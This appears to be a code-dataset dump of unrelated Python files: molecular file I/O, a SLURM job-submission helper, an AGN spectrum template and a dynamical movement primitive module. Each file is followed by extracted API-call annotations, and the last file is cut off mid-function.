for j in range(natom):
atomline = f.readline().split()
crd = tuple(map(float, atomline[0:3]))
symb = atomline[3]
try:
num = PT.get_atomic_number(symb)
except PTError:
num = 0
self.add_atom(Atom(atnum=num, coords=crd))
for j in range(nbond):
bondline = f.readline().split()
at1 = self.atoms[int(bondline[0]) - 1]
at2 = self.atoms[int(bondline[1]) - 1]
ordr = int(bondline[2])
if ordr == 4:
ordr = Bond.AR
self.add_bond(Bond(atom1=at1, atom2=at2, order=ordr))
break
elif spl[len(spl)-1] == 'V3000':
raise FileError('readmol: Molfile V3000 not supported. Please convert')
else:
comment.append(line)
if comment:
self.properties['comment'] = comment
def writemol(self, f):
commentblock = ['\n']*3
if 'comment' in self.properties:
comment = self.properties['comment']
if isinstance(comment, str):
commentblock[0] = comment + '\n'
elif isinstance(comment, list):
comment = comment[0:3]
while len(comment) < 3:
comment.append('')
commentblock = [a+b for a,b in zip(comment,commentblock)]
f.writelines(commentblock)
self.set_atoms_id()
f.write('%3i%3i 0 0 0 0 0 0 0 0999 V2000\n' % (len(self.atoms),len(self.bonds)))
for at in self.atoms:
f.write('%10.4f%10.4f%10.4f %-3s 0 0 0 0 0 0\n' % (at.x,at.y,at.z,at.symbol))
for bo in self.bonds:
order = bo.order
if order == Bond.AR:
order = 4
f.write('%3i%3i%3i 0 0 0\n' % (bo.atom1.id,bo.atom2.id,order))
self.unset_atoms_id()
f.write('M END\n')
def readmol2(self, f, frame):
if frame != 1:
raise MoleculeError('readmol: .mol2 files do not support multiple geometries')
bondorders = {'1':1, '2':2, '3':3, 'am':1, 'ar':Bond.AR, 'du':0, 'un':1, 'nc':0}
mode = ('', 0)
for i, line in enumerate(f):
line = line.rstrip()
if not line:
continue
elif line[0] == '#':
continue
elif line[0] == '@':
line = line.partition('>')[2]
if not line:
raise FileError('readmol2: Error in %s line %i: invalid @ record' % (f.name, str(i+1)))
mode = (line, i)
elif mode[0] == 'MOLECULE':
pos = i - mode[1]
if pos == 1:
self.properties['name'] = line
elif pos == 3:
self.properties['type'] = line
elif pos == 4:
self.properties['charge_type'] = line
elif pos == 5:
self.properties['flags'] = line
elif pos == 6:
self.properties['comment'] = line
elif mode[0] == 'ATOM':
spl = line.split()
if len(spl) < 6:
raise FileError('readmol2: Error in %s line %i: not enough values in line' % (f.name, str(i+1)))
symb = spl[5].partition('.')[0]
try:
num = PT.get_atomic_number(symb)
except PTError:
num = 0
crd = tuple(map(float, spl[2:5]))
newatom = Atom(atnum=num, coords=crd, name=spl[1], type=spl[5])
if len(spl) > 6:
newatom.properties['subst_id'] = spl[6]
if len(spl) > 7:
newatom.properties['subst_name'] = spl[7]
if len(spl) > 8:
newatom.properties['charge'] = float(spl[8])
if len(spl) > 9:
newatom.properties['flags'] = spl[9]
self.add_atom(newatom)
elif mode[0] == 'BOND':
spl = line.split()
if len(spl) < 4:
raise FileError('readmol2: Error in %s line %i: not enough values in line' % (f.name, str(i+1)))
try:
atom1 = self.atoms[int(spl[1])-1]
atom2 = self.atoms[int(spl[2])-1]
except IndexError:
raise FileError('readmol2: Error in %s line %i: wrong atom ID' % (f.name, str(i+1)))
newbond = Bond(atom1, atom2, order=bondorders[spl[3]])
if len(spl) > 4:
for flag in spl[4].split('|'):
newbond.properties[flag] = True
self.add_bond(newbond)
def writemol2(self, f):
bondorders = ['1','2','3','ar']
def write_prop(name, obj, separator, space=0, replacement=None):
form_str = '%-' + str(space) + 's'
if name in obj.properties:
f.write(form_str % str(obj.properties[name]))
elif replacement is not None:
f.write(form_str % str(replacement))
f.write(separator)
f.write('@<TRIPOS>MOLECULE\n')
write_prop('name', self, '\n')
f.write('%i %i\n' % (len(self.atoms),len(self.bonds)))
write_prop('type', self, '\n')
write_prop('charge_type', self, '\n')
write_prop('flags', self, '\n')
write_prop('comment', self, '\n')
f.write('\n@<TRIPOS>ATOM\n')
for i,at in enumerate(self.atoms):
f.write('%5i ' % (i+1))
write_prop('name', at, ' ', 5, at.symbol+str(i+1))
f.write('%10.4f %10.4f %10.4f ' % at.coords)
write_prop('type', at, ' ', 5, at.symbol)
write_prop('subst_id', at, ' ', 5)
write_prop('subst_name', at, ' ', 7)
write_prop('charge', at, ' ', 6)
write_prop('flags', at, '\n')
at.id = i+1
f.write('\n@<TRIPOS>BOND\n')
for i,bo in enumerate(self.bonds):
f.write('%5i %5i %5i %4s' % (i+1, bo.atom1.id, bo.atom2.id, bondorders[bo.order]))
write_prop('flags', bo, '\n')
self.unset_atoms_id()
def readpdb(self, f, frame):
pdb = PDBHandler(f)
models = pdb.get_models()
if frame > len(models):
raise FileError('readpdb: There are only %i frames in %s' % (len(models), f.name))
symbol_columns = [70,6,7,8]
for i in models[frame-1]:
if i.name in ['ATOM ','HETATM']:
x = float(i.value[0][24:32])
y = float(i.value[0][32:40])
z = float(i.value[0][40:48])
for n in symbol_columns:
symbol = i.value[0][n:n+2].strip()
try:
atnum = PT.get_atomic_number(symbol)
break
except PTError:
if n == symbol_columns[-1]:
raise FileError('readpdb: Unable to deduce the atomic symbol in the following line:\n%s'%(i.name+i.value[0]))
self.add_atom(Atom(atnum=atnum,coords=(x,y,z)))
return pdb
def writepdb(self, f):
pdb = PDBHandler()
pdb.add_record(PDBRecord('HEADER'))
model = []
for i,at in enumerate(self.atoms):
s = 'ATOM %5i %8.3f%8.3f%8.3f %2s ' % (i+1,at.x,at.y,at.z,at.symbol.upper())
model.append(PDBRecord(s))
pdb.add_model(model)
pdb.add_record(pdb.calc_master())
pdb.add_record(PDBRecord('END'))
pdb.write(f)
def read(self, filename, inputformat=None, frame=1):
"""Read molecular coordinates from file.
*filename* should be a string with a path to the file. If *inputformat* is not ``None``, it should be one of supported formats (keys occurring in class attribute ``_readformat``). Otherwise, format of the file is deduced from file's extension (for files without extension `xyz` format is assumed).
If chosen format allows multiple geometries in a single file, *frame* can be used to pick one of them.
"""
if inputformat is None:
fsplit = filename.rsplit('.',1)
if len(fsplit) == 2:
inputformat = fsplit[1]
else:
inputformat = 'xyz'
if inputformat in self.__class__._readformat:
with open(filename, 'rU') as f:
ret = self._readformat[inputformat](self, f, frame)
return ret
else:
raise MoleculeError('read: Unsupported file format')
def write(self, filename, outputformat=None):
"""Write molecular coordinates to a file.
*filename* should be a string with a path to the file. If *outputformat* is not ``None``, it should be one of supported formats (keys occurring in class attribute ``_writeformat``). Otherwise, format of the file is deduced from file's extension (for files without extension `xyz` format is assumed).
"""
if outputformat is None:
fsplit = filename.rsplit('.',1)
if len(fsplit) == 2:
outputformat = fsplit[1]
else:
outputformat = 'xyz'
if outputformat in self.__class__._writeformat:
with open(filename, 'w') as f:
self._writeformat[outputformat](self, f)
else:
raise MoleculeError('write: Unsupported file format')
_readformat = {'xyz':readxyz, 'mol':readmol, 'mol2':readmol2, 'pdb':readpdb}
_writeformat = {'xyz':writexyz, 'mol':writemol, 'mol2':writemol2, 'pdb': writepdb}
#===================================================================================================
#==== JSON IO ======================================================================================
#===================================================================================================
def as_dict(self):
"""
The Molecule information is stored in a dict based on the mol
`file format <http://onlinelibrarystatic.wiley.com/marvin/help/FF/19693841.html>`
:returns: JSON object
"""
# def create_atom_ids(mol):
# """
# Generate unique identifier for each atom
# :parameter mol: Molecule object containing the atoms
# :type mol: |Molecule|
# """
# ds = []
# for i,self.assertTrue() in enumerate(mol.atoms):
# idx = "atom_" + str(i)
# ds.append(idx)
# return ds
def create_atom_block(mol):
"""
In this block are stored the atomic number, coordinates,
atomic symbols and others properties that are passed as a *Setting* object.
:parameter mol: Molecule object containing the atoms
:type mol: |Molecule|
:parameter ids: List of unique identifier
:type ids: [Int]
"""
return [{'coords': at.coords, 'symbol': at.symbol,
'atnum': at.atnum, 'properties': at.properties.as_dict()} for at in mol.atoms]
def create_bond_block(mol):
"""
:parameter mol: Molecule object containing the atoms
:type mol: |Molecule|
:parameter ids: List of unique identifier
:type ids: [Int]
The data list on table bellow is used to store
information related to the bonds.
================= =====================
Meaning Value
================== =====================
First atom number Int
Second atom number Int
Bond type Int (float for aromatic)
#. Single
#. Double
#. Triple
#. Aromatic
Properties Settings
================== =====================
"""
def get_bond_order(bond):
if bond.order:
return bond.order
elif bond.AR:
return bond.AR
else:
msg = "bond does not contain order attribute"
raise AttributeError(msg)
# Represent the atoms involved in the bond like references
# to the unique identifiers stored in the ``atomBlock``
# dict_atom2id = {at: idx for (at, idx) in zip(mol.atoms, ids)}
bonds_list = []
for i, b in enumerate(mol.bonds):
atom1 = mol.atoms.index(b.atom1)
atom2 = mol.atoms.index(b.atom2)
order = get_bond_order(b)
bond = {'atom1': atom1, 'atom2': atom2,
'order': order, 'properties': b.properties.as_dict()}
bonds_list.append(bond)
return bonds_list
d = dict()
d["atomBlock"] = create_atom_block(self)
d["bondBlock"] = create_bond_block(self)
d["properties"] = self.properties
return d
@classmethod
def from_dict(cls, atomBlock, bondBlock, properties):
"""
Generate a new Molecule instance using the data stored
in the dictionary representing the JSON serialized data
:parameter ds: Dict containing the JSON serialized molecule
:type ds: Dict
:returns: |Molecule|
"""
# New Molecule instance
mol = cls()
# dict from unique atom identifiers to numeration
# inside the molecule
# Reconstruct the Atom instances using the Json data
for at in atomBlock:
atnum = at["atnum"]
coords = at["coords"]
symbol = at["symbol"]
props = at["properties"]
mol.add_atom(Atom(atnum=atnum, coords=coords, symbol=symbol,
**props))
# Reconstruct the bonds using the internal numeration of the molecule
# build in the previous step.
for b in bondBlock:
id_atom1 = b["atom1"]
id_atom2 = b["atom2"]
atom1 = mol.atoms[id_atom1]
atom2 = mol.atoms[id_atom2]
bond = Bond(atom1=atom1, atom2=atom2, order=b["order"],
**b["properties"])
mol.add_bond(bond)
mol.properties = properties
return mol
|
[
"copy.deepcopy",
"heapq.heapify",
"math.sqrt",
"os.path.basename",
"math.floor",
"numpy.identity",
"math.sin",
"heapq.heappop",
"math.acos",
"numpy.array",
"numpy.linalg.norm",
"math.cos",
"numpy.dot"
] |
[((22720, 22739), 'copy.deepcopy', 'copy.deepcopy', (['self'], {}), '(self)\n', (22733, 22739), False, 'import copy\n'), ((35178, 35197), 'heapq.heapify', 'heapq.heapify', (['heap'], {}), '(heap)\n', (35191, 35197), False, 'import heapq\n'), ((39008, 39028), 'numpy.linalg.norm', 'numpy.linalg.norm', (['v'], {}), '(v)\n', (39025, 39028), False, 'import numpy\n'), ((39042, 39109), 'numpy.array', 'numpy.array', (['[[0, -v[2], v[1]], [v[2], 0, -v[0]], [-v[1], v[0], 0]]'], {}), '([[0, -v[2], v[1]], [v[2], 0, -v[0]], [-v[1], v[0], 0]])\n', (39053, 39109), False, 'import numpy\n'), ((39227, 39242), 'math.sin', 'math.sin', (['angle'], {}), '(angle)\n', (39235, 39242), False, 'import math\n'), ((9726, 9740), 'math.sqrt', 'math.sqrt', (['res'], {}), '(res)\n', (9735, 9740), False, 'import math\n'), ((11241, 11261), 'math.acos', 'math.acos', (['(num / den)'], {}), '(num / den)\n', (11250, 11261), False, 'import math\n'), ((22574, 22593), 'copy.deepcopy', 'copy.deepcopy', (['self'], {}), '(self)\n', (22587, 22593), False, 'import copy\n'), ((35432, 35451), 'heapq.heappop', 'heapq.heappop', (['heap'], {}), '(heap)\n', (35445, 35451), False, 'import heapq\n'), ((41614, 41629), 'math.sqrt', 'math.sqrt', (['dist'], {}), '(dist)\n', (41623, 41629), False, 'import math\n'), ((11748, 11767), 'numpy.array', 'numpy.array', (['matrix'], {}), '(matrix)\n', (11759, 11767), False, 'import numpy\n'), ((11827, 11851), 'numpy.array', 'numpy.array', (['self.coords'], {}), '(self.coords)\n', (11838, 11851), False, 'import numpy\n'), ((39269, 39290), 'math.sin', 'math.sin', (['(0.5 * angle)'], {}), '(0.5 * angle)\n', (39277, 39290), False, 'import math\n'), ((39313, 39330), 'numpy.identity', 'numpy.identity', (['(3)'], {}), '(3)\n', (39327, 39330), False, 'import numpy\n'), ((39347, 39362), 'numpy.dot', 'numpy.dot', (['W', 'W'], {}), '(W, W)\n', (39356, 39362), False, 'import numpy\n'), ((21675, 21701), 'os.path.basename', 'os.path.basename', (['filename'], {}), '(filename)\n', (21691, 21701), False, 'import os\n'), ((43485, 43500), 'math.cos', 'math.cos', (['(x / R)'], {}), '(x / R)\n', (43493, 43500), False, 'import math\n'), ((43508, 43523), 'math.sin', 'math.sin', (['(x / R)'], {}), '(x / R)\n', (43516, 43523), False, 'import math\n'), ((33757, 33781), 'math.floor', 'math.floor', (['(x / cubesize)'], {}), '(x / cubesize)\n', (33767, 33781), False, 'import math\n')]
|
"""
Module to run programs on ibex
"""
import numpy as np
import logging
from .executor import Executor
import re
from pathlib import Path
class RunError(Exception):
"""
Class for exceptions
"""
pass
class IbexRun(Executor):
"""
Class to create jobs to run in ibex. When the `run()` method is called,
a shell script will be submitted to the cluster via the `sbatch` command.
Methods to overwrite:
- `__init__` set up your own inputs, and the output directory for the jobs
and the ibex stdout
- `prepare` create and save the script that will be submitted to sbatch.
In this script you can run terminal commands directly, or
other python scripts.
"""
def __init__(self, time_per_command:int, out_ibex:Path, ncommands:int=1,
jobname:str='IbexRun', partition:str='batch', ntasks:int=1,
cpus_per_task:int=1, mem_per_cpu:int=2, max_jobs:int=1990, **kw):
"""
Define variables for the ibex job
Args:
time_per_command (int):
Time that each individual command takes to run.
out_ibex (Path):
Directory to save output from ibex stdout
ncommands (int, optional):
Number of total commands to be run, which will later will be
distributed in a maximum of 2,000 jobs in a job array.
Defaults to 1.
jobname (str, optional):
Name of the job to be submitted. It will show in the ibex queue.
Defaults to 'IbexRun'.
partition (str, optional):
Partition to run the job in ibex. Defaults to 'batch'.
ntasks (int, optional):
Number of tasks for the ibex job array. In most cases you will
leave it as is. Defaults to 1.
cpus_per_task (int, optional):
Number of CPUs to be used per task. Defaults to 1.
mem_per_cpu (int, optional):
GBs of memory per CPU to request. Defaults to 2.
"""
self.time_per_command = time_per_command
self.jobname = jobname
self.partition = partition
self.out_ibex = out_ibex
self.ntasks = ntasks
self.cpus_per_task = cpus_per_task
self.mem_per_cpu = mem_per_cpu
self.ncommands=ncommands
self.max_jobs = max_jobs
self.commands_per_job = int(np.ceil( self.ncommands / self.max_jobs ))
self.njobs = int(np.ceil( self.ncommands / self.commands_per_job ))
self.time_per_job = self.time_str(self.commands_per_job,
self.time_per_command)
self.script_file = out_ibex / 'script.sh'
self.args = f'sbatch {self.script_file}'.split()
super().__init__(self.args, **kw)
@staticmethod
def time_str(commands_per_job:int, t_per_command:int) -> str:
"""
Get the time of the job in the format hh:mm:ss according to the number
of commands to run
Args:
commands_per_job (int): Number of commands to run per job in the array
t_per_command (int): Time in minutes to run each command
Returns:
str: Time to request for each job in the array in hh:mm:ss format
"""
total_minutes = commands_per_job * t_per_command
hours = np.floor(total_minutes/60)
minutes = np.ceil(total_minutes % 60)
return f'{int(hours):02}:{int(minutes):02}:00'
def prepare(self):
"""
Make the script to be run in sbatch.
This method will be overwritten in your own class, to make the script
specific to the command that you wish to run.
"""
if not self.out_ibex.exists():
self.out_ibex.mkdir(parents=True)
self.script = (
# This part will stay the same:
"#!/bin/bash\n"
f"#SBATCH --job-name={self.jobname}\n"
f"#SBATCH --partition={self.partition}\n"
f"#SBATCH --output={self.out_ibex}/%J.out\n"
f"#SBATCH --time={self.time_per_job}\n"
f"#SBATCH --ntasks={self.ntasks}\n"
f"#SBATCH --cpus-per-task={self.cpus_per_task}\n"
f"#SBATCH --mem-per-cpu={self.mem_per_cpu}G\n"
f"#SBATCH --array=0-{self.njobs-1}\n"
"\n"
# This part will be overwritten:
"echo 'Hello world!'\n"
# Example using the SLURM_ARRAY_TASK_ID variable
# "seq_file='sequences_${SLURM_ARRAY_TASK_ID}.fasta'\n"
# "python script.py ${seq_file}\n"
)
logging.info(f'Script to be submitted:\n{self.script}')
with open(self.script_file, 'w') as f:
f.write(self.script)
def finish(self) -> str:
"""
Returns the job id if the submission to sbatch was successful.
"""
return re.search(r'\d+', self.completed_process.stdout).group()
|
[
"logging.info",
"numpy.floor",
"re.search",
"numpy.ceil"
] |
[((3405, 3433), 'numpy.floor', 'np.floor', (['(total_minutes / 60)'], {}), '(total_minutes / 60)\n', (3413, 3433), True, 'import numpy as np\n'), ((3450, 3477), 'numpy.ceil', 'np.ceil', (['(total_minutes % 60)'], {}), '(total_minutes % 60)\n', (3457, 3477), True, 'import numpy as np\n'), ((4668, 4726), 'logging.info', 'logging.info', (['f"""Script to be submitted:\n{self.script}"""'], {}), '(f"""Script to be submitted:\n{self.script}""")\n', (4680, 4726), False, 'import logging\n'), ((2481, 2520), 'numpy.ceil', 'np.ceil', (['(self.ncommands / self.max_jobs)'], {}), '(self.ncommands / self.max_jobs)\n', (2488, 2520), True, 'import numpy as np\n'), ((2549, 2596), 'numpy.ceil', 'np.ceil', (['(self.ncommands / self.commands_per_job)'], {}), '(self.ncommands / self.commands_per_job)\n', (2556, 2596), True, 'import numpy as np\n'), ((4946, 4994), 're.search', 're.search', (['"""\\\\d+"""', 'self.completed_process.stdout'], {}), "('\\\\d+', self.completed_process.stdout)\n", (4955, 4994), False, 'import re\n')]
|
"""
<NAME>., <NAME>., & <NAME>. 2004, MNRAS, 347, 144
"""
import numpy as np
# Parameters for the Sazonov & Ostriker AGN template
_Alpha = 0.24
_Beta = 1.60
_Gamma = 1.06
_E_1 = 83e3
_K = 0.0041
_E_0 = (_Beta - _Alpha) * _E_1
_A = np.exp(2e3 / _E_1) * 2e3**_Alpha
_B = ((_E_0**(_Beta - _Alpha)) \
* np.exp(-(_Beta - _Alpha))) / \
(1.0 + (_K * _E_0**(_Beta - _Gamma)))
# Normalization constants to make the SOS04 spectrum continuous.
_SX_Normalization = 1.0
_UV_Normalization = _SX_Normalization * ((_A * 2e3**-_Alpha) * \
np.exp(-2e3 / _E_1)) / ((1.2 * 2e3**-1.7) * np.exp(2000.0 / 2000.))
_IR_Normalization = _UV_Normalization * ((1.2 * 10**-1.7) \
* np.exp(10.0 / 2e3)) / (1.2 * 159 * 10**-0.6)
_HX_Normalization = _SX_Normalization * (_A * _E_0**-_Alpha * \
np.exp(-_E_0 / _E_1)) / (_A * _B * (1.0 + _K * _E_0**(_Beta - _Gamma)) * \
_E_0**-_Beta)
def Spectrum(E, t=0.0, **kwargs):
"""
Broadband quasar template spectrum.
References
----------
<NAME>., <NAME>., & <NAME>. 2004, MNRAS, 347, 144.
"""
op = (E < 10)
uv = (E >= 10) & (E < 2e3)
xs = (E >= 2e3) & (E < _E_0)
xh = (E >= _E_0) & (E < 4e5)
if type(E) in [int, float]:
if op:
F = _IR_Normalization * 1.2 * 159 * E**-0.6
elif uv:
F = _UV_Normalization * 1.2 * E**-1.7 * np.exp(E / 2000.0)
elif xs:
F = _SX_Normalization * _A * E**-_Alpha * np.exp(-E / _E_1)
elif xh:
F = _HX_Normalization * _A * _B * (1.0 + _K * \
E**(_Beta - _Gamma)) * E**-_Beta
else:
F = 0
else:
F = np.zeros_like(E)
F += op * _IR_Normalization * 1.2 * 159 * E**-0.6
F += uv * _UV_Normalization * 1.2 * E**-1.7 * np.exp(E / 2000.0)
F += xs * _SX_Normalization * _A * E**-_Alpha * np.exp(-E / _E_1)
F += xh * _HX_Normalization * _A * _B * (1.0 + _K * \
E**(_Beta - _Gamma)) * E**-_Beta
return E * F
|
[
"numpy.zeros_like",
"numpy.exp"
] |
[((233, 254), 'numpy.exp', 'np.exp', (['(2000.0 / _E_1)'], {}), '(2000.0 / _E_1)\n', (239, 254), True, 'import numpy as np\n'), ((305, 330), 'numpy.exp', 'np.exp', (['(-(_Beta - _Alpha))'], {}), '(-(_Beta - _Alpha))\n', (311, 330), True, 'import numpy as np\n'), ((585, 608), 'numpy.exp', 'np.exp', (['(2000.0 / 2000.0)'], {}), '(2000.0 / 2000.0)\n', (591, 608), True, 'import numpy as np\n'), ((1674, 1690), 'numpy.zeros_like', 'np.zeros_like', (['E'], {}), '(E)\n', (1687, 1690), True, 'import numpy as np\n'), ((541, 563), 'numpy.exp', 'np.exp', (['(-2000.0 / _E_1)'], {}), '(-2000.0 / _E_1)\n', (547, 563), True, 'import numpy as np\n'), ((675, 696), 'numpy.exp', 'np.exp', (['(10.0 / 2000.0)'], {}), '(10.0 / 2000.0)\n', (681, 696), True, 'import numpy as np\n'), ((788, 808), 'numpy.exp', 'np.exp', (['(-_E_0 / _E_1)'], {}), '(-_E_0 / _E_1)\n', (794, 808), True, 'import numpy as np\n'), ((1803, 1821), 'numpy.exp', 'np.exp', (['(E / 2000.0)'], {}), '(E / 2000.0)\n', (1809, 1821), True, 'import numpy as np\n'), ((1878, 1895), 'numpy.exp', 'np.exp', (['(-E / _E_1)'], {}), '(-E / _E_1)\n', (1884, 1895), True, 'import numpy as np\n'), ((1364, 1382), 'numpy.exp', 'np.exp', (['(E / 2000.0)'], {}), '(E / 2000.0)\n', (1370, 1382), True, 'import numpy as np\n'), ((1454, 1471), 'numpy.exp', 'np.exp', (['(-E / _E_1)'], {}), '(-E / _E_1)\n', (1460, 1471), True, 'import numpy as np\n')]
|
import numpy as np
from ._base import DMPBase, WeightParametersMixin
from ._forcing_term import ForcingTerm
from ._canonical_system import canonical_system_alpha
from ._dmp import dmp_imitate, dmp_open_loop
class DMPWithFinalVelocity(WeightParametersMixin, DMPBase):
"""Dynamical movement primitive (DMP) with final velocity.
Implementation according to
<NAME>, <NAME>, <NAME>, <NAME>:
Learning to Select and Generalize Striking Movements in Robot Table Tennis
(2013), International Journal of Robotics Research 32(3), pp. 263-279,
https://www.ias.informatik.tu-darmstadt.de/uploads/Publications/Muelling_IJRR_2013.pdf
Parameters
----------
n_dims : int
State space dimensions.
execution_time : float
Execution time of the DMP.
dt : float, optional (default: 0.01)
Time difference between DMP steps.
n_weights_per_dim : int, optional (default: 10)
Number of weights of the function approximator per dimension.
int_dt : float, optional (default: 0.001)
Time difference for Euler integration.
p_gain : float, optional (default: 0)
Gain for proportional controller of DMP tracking error.
The domain is [0, execution_time**2/dt].
Attributes
----------
dt_ : float
Time difference between DMP steps. This value can be changed to adapt
the frequency.
"""
def __init__(self, n_dims, execution_time, dt=0.01, n_weights_per_dim=10,
int_dt=0.001, p_gain=0.0):
super(DMPWithFinalVelocity, self).__init__(n_dims, n_dims)
self.execution_time = execution_time
self.dt_ = dt
self.n_weights_per_dim = n_weights_per_dim
self.int_dt = int_dt
self.p_gain = p_gain
alpha_z = canonical_system_alpha(0.01, self.execution_time, 0.0,
self.int_dt)
self.forcing_term = ForcingTerm(self.n_dims, self.n_weights_per_dim,
self.execution_time, 0.0, 0.8, alpha_z)
self.alpha_y = 25.0
self.beta_y = self.alpha_y / 4.0
def step(self, last_y, last_yd, coupling_term=None):
"""DMP step.
Parameters
----------
last_y : array, shape (n_dims,)
Last state.
last_yd : array, shape (n_dims,)
Last time derivative of state (e.g., velocity).
coupling_term : object, optional (default: None)
Coupling term that will be added to velocity.
Returns
-------
y : array, shape (n_dims,)
Next state.
yd : array, shape (n_dims,)
Next time derivative of state (e.g., velocity).
"""
self.last_t = self.t
self.t += self.dt_
if not self.initialized:
self.current_y = np.copy(self.start_y)
self.current_yd = np.copy(self.start_yd)
self.initialized = True
# https://github.com/studywolf/pydmps/blob/master/pydmps/cs.py
tracking_error = self.current_y - last_y
dmp_step_euler_with_constraints(
self.last_t, self.t,
self.current_y, self.current_yd,
self.goal_y, self.goal_yd, self.goal_ydd,
self.start_y, self.start_yd, self.start_ydd,
self.execution_time, 0.0,
self.alpha_y, self.beta_y,
self.forcing_term,
coupling_term=coupling_term,
int_dt=self.int_dt,
p_gain=self.p_gain,
tracking_error=tracking_error)
return np.copy(self.current_y), np.copy(self.current_yd)
def open_loop(self, run_t=None, coupling_term=None):
"""Run DMP open loop.
Parameters
----------
run_t : float, optional (default: execution_time)
Run time of DMP. Can be shorter or longer than execution_time.
coupling_term : object, optional (default: None)
Coupling term that will be added to velocity.
Returns
-------
T : array, shape (n_steps,)
Time for each step.
Y : array, shape (n_steps, n_dims)
State at each step.
"""
return dmp_open_loop(
self.execution_time, 0.0, self.dt_,
self.start_y, self.goal_y,
self.alpha_y, self.beta_y,
self.forcing_term,
coupling_term,
run_t, self.int_dt,
dmp_step_euler_with_constraints,
start_yd=self.start_yd, start_ydd=self.start_ydd,
goal_yd=self.goal_yd, goal_ydd=self.goal_ydd)
def imitate(self, T, Y, regularization_coefficient=0.0):
"""Imitate demonstration.
Parameters
----------
T : array, shape (n_steps,)
Time for each step.
Y : array, shape (n_steps, n_dims)
State at each step.
regularization_coefficient : float, optional (default: 0)
Regularization coefficient for regression.
"""
self.forcing_term.weights[:, :], start_y, start_yd, start_ydd, goal_y, goal_yd, goal_ydd = dmp_imitate(
T, Y,
n_weights_per_dim=self.n_weights_per_dim,
regularization_coefficient=regularization_coefficient,
alpha_y=self.alpha_y, beta_y=self.beta_y,
overlap=self.forcing_term.overlap,
alpha_z=self.forcing_term.alpha_z, allow_final_velocity=True,
determine_forces=determine_forces)
self.configure(
start_y=start_y, start_yd=start_yd, start_ydd=start_ydd,
goal_y=goal_y, goal_yd=goal_yd, goal_ydd=goal_ydd)
def solve_constraints(t0, t1, y0, y0d, y0dd, y1, y1d, y1dd):
t02 = t0 * t0
t03 = t02 * t0
t04 = t03 * t0
t05 = t04 * t0
t12 = t1 * t1
t13 = t12 * t1
t14 = t13 * t1
t15 = t14 * t1
M = np.array([[1, t0, t02, t03, t04, t05],
[0, 1, 2 * t0, 3 * t02, 4 * t03, 5 * t04],
[0, 0, 2, 6 * t0, 12 * t02, 20 * t03],
[1, t1, t12, t13, t14, t15],
[0, 1, 2 * t1, 3 * t12, 4 * t13, 5 * t14],
[0, 0, 2, 6 * t1, 12 * t12, 20 * t13]])
Y = np.vstack((y0, y0d, y0dd, y1, y1d, y1dd))
# Solve M*b = y for b in each DOF at once
B = np.linalg.solve(M, Y)
return B
def apply_constraints(t, goal_y, goal_t, coefficients):
if t > goal_t + np.finfo(float).eps:
# For t > goal_t the polynomial should always 'pull' to the goal
# position, but velocity and acceleration should be zero.
# This is done to avoid diverging from the goal if the DMP is executed
# longer than expected.
return goal_y, np.zeros_like(goal_y), np.zeros_like(goal_y)
else:
t2 = t * t
t3 = t2 * t
t4 = t3 * t
t5 = t4 * t
pos = np.array([1, t, t2, t3, t4, t5])
vel = np.array([0, 1, 2 * t, 3 * t2, 4 * t3, 5 * t4])
acc = np.array([0, 0, 2, 6 * t, 12 * t2, 20 * t3])
g = np.dot(pos, coefficients)
gd = np.dot(vel, coefficients)
gdd = np.dot(acc, coefficients)
return g, gd, gdd
def determine_forces(T, Y, alpha_y, beta_y, allow_final_velocity):
"""Determine forces that the forcing term should generate.
Parameters
----------
T : array, shape (n_steps,)
Time of each step.
Y : array, shape (n_steps, n_dims)
Position at each step.
alpha_y : float
Parameter of the transformation system.
beta_y : float
Parameter of the transformation system.
allow_final_velocity : bool
Whether a final velocity is allowed. This should always be True for
this function.
Returns
-------
F : array, shape (n_steps, n_dims)
Forces.
start_y : array, shape (n_dims,)
Start position.
start_yd : array, shape (n_dims,)
Start velocity.
start_ydd : array, shape (n_dims,)
Start acceleration.
goal_y : array, shape (n_dims,)
Final position.
goal_yd : array, shape (n_dims,)
Final velocity.
goal_ydd : array, shape (n_dims,)
Final acceleration.
"""
assert allow_final_velocity
n_dims = Y.shape[1]
DT = np.diff(T)
Yd = np.empty_like(Y)
Yd[0] = 0.0
for d in range(n_dims):
Yd[1:, d] = np.diff(Y[:, d]) / DT
Ydd = np.empty_like(Y)
Ydd[0] = 0.0
for d in range(n_dims):
Ydd[1:, d] = np.diff(Yd[:, d]) / DT
coefficients = solve_constraints(
T[0], T[-1], Y[0], Yd[0], Ydd[0], Y[-1], Yd[-1], Ydd[-1])
execution_time = T[-1] - T[0]
F = np.empty((len(T), n_dims))
for i in range(len(T)):
g, gd, gdd = apply_constraints(T[i], Y[-1], T[-1], coefficients)
F[i, :] = execution_time ** 2 * Ydd[i] - alpha_y * (
beta_y * (g - Y[i]) + gd * execution_time
- Yd[i] * execution_time) - execution_time ** 2 * gdd
return F, Y[0], Yd[0], Ydd[0], Y[-1], Yd[-1], Ydd[-1]
def dmp_step_euler_with_constraints(
last_t, t, current_y, current_yd, goal_y, goal_yd, goal_ydd,
start_y, start_yd, start_ydd, goal_t, start_t, alpha_y, beta_y,
forcing_term, coupling_term=None, coupling_term_precomputed=None,
int_dt=0.001, p_gain=0.0, tracking_error=0.0):
"""Integrate regular DMP for one step with Euler integration.
Parameters
----------
last_t : float
Time at last step.
t : float
Time at current step.
current_y : array, shape (n_dims,)
Current position. Will be modified.
current_yd : array, shape (n_dims,)
Current velocity. Will be modified.
goal_y : array, shape (n_dims,)
Goal position.
goal_yd : array, shape (n_dims,)
Goal velocity.
goal_ydd : array, shape (n_dims,)
Goal acceleration.
start_y : array, shape (n_dims,)
Start position.
start_yd : array, shape (n_dims,)
Start velocity.
start_ydd : array, shape (n_dims,)
Start acceleration.
goal_t : float
Time at the end.
start_t : float
Time at the start.
alpha_y : float
Constant in transformation system.
beta_y : float
Constant in transformation system.
forcing_term : ForcingTerm
Forcing term.
coupling_term : CouplingTerm, optional (default: None)
Coupling term. Must have a function coupling(y, yd) that returns
additional velocity and acceleration.
coupling_term_precomputed : tuple
A precomputed coupling term, i.e., additional velocity and
acceleration.
int_dt : float, optional (default: 0.001)
Time delta used internally for integration.
p_gain : float, optional (default: 0)
Proportional gain for tracking error.
tracking_error : float, optional (default: 0)
Tracking error from last step.
"""
if start_t >= goal_t:
raise ValueError("Goal must be chronologically after start!")
if t <= start_t:
return np.copy(start_y), np.copy(start_yd), np.copy(start_ydd)
execution_time = goal_t - start_t
coefficients = solve_constraints(
start_t, goal_t, start_y, start_yd, start_ydd,
goal_y, goal_yd, goal_ydd)
current_t = last_t
while current_t < t:
